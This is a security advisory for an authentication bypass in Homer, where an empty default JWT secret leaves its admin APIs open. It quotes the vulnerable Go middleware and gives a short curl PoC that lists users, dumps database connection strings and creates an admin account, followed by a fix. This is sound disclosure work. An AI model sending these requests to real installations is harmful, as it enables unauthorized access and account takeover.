CVE-2026-62253: Homer: Complete Authentication Bypass When coordinator.jwt.secret Is Empty (Default)
### Summary Both JWT middleware functions (`JWTMiddleware` and `JWTMiddlewareV4`) immediately return `next(c)` when `jwtSecret == ""`. The JWT secret defaults to an empty string. On a default installation, all protected API endpoints under `/api/v1`, `/api/v3`, and `/api/v4` are completely unauthenticated. ### Details **`coordinator/handlers/auth.go` lines 298-304:** ```go func (h *Auth) JWTMiddleware() echo.MiddlewareFunc { return func(next echo.HandlerFunc) echo.HandlerFunc { return func(c echo.Context) error { if h.jwtSecret == "" { return next(c) // bypass — no validation performed } ``` **`coordinator/handlers/auth_v4_helpers.go` lines 177-182:** ```go func (h *Auth) JWTMiddlewareV4() echo.MiddlewareFunc { return func(next echo.HandlerFunc) echo.HandlerFunc { return func(c echo.Context) error { if h.jwtSecret == "" { return next(c) // same bypass ``` **`coordinator/coordinator.go` lines 315-317:** ```go if c.config.JWT.Secret != "" { protected.Use(authHandler.JWTMiddleware()) // middleware not even registered when secret is empty } ``` **`config/config.go` line 845:** `Secret` field struct tag has `default:""`. The example config ships a placeholder value, but the Go struct default (used when no config is provided) is empty. ### PoC ```bash # On a default Homer installation (no JWT secret configured), all protected routes are open: curl http://<homer-host>/api/v3/users # Returns full user list with no credentials curl http://<homer-host>/api/v3/databases # Returns all database connection strings curl -X POST http://<homer-host>/api/v3/users \ -H 'Content-Type: application/json' \ -d '{"username":"attacker","password":"pw","partid":10,"usergroup":"admin"}' # Creates a new admin user with no credentials ``` ### Impact Missing Authentication for Critical Function (CWE-306). On a default Homer installation with no JWT secret configured, every admin API endpoint is completely unauthenticated. Attackers can read/write all configuration, users, database connections, and stored VoIP call data. ### Fix Fail closed: if `JWT.Secret` is empty at startup, abort with a fatal error requiring the operator to set a strong secret. Remove the empty-string shortcircuit from both middleware functions: ```go if h.jwtSecret == "" { log.Fatal("coordinator.jwt.secret must be set to a non-empty value") } ``` If possible, please apply for a CVE number when posting.
Recommended action
Recommended action
Upgrade affected packages to a patched version: github.com/sipcapture/homer-app 0.0.0-20260625093330-5e90809657c9.
Technical details
- Vendor
- Not specified
- Product
- github.com/sipcapture/homer-app
- Exploitation
- none known
- Evidence
- official
Evidence and sources
This record is attributed to GitHub Advisories. Exploitation status and remediation guidance are kept separate from the vulnerability's technical severity.
Open primary source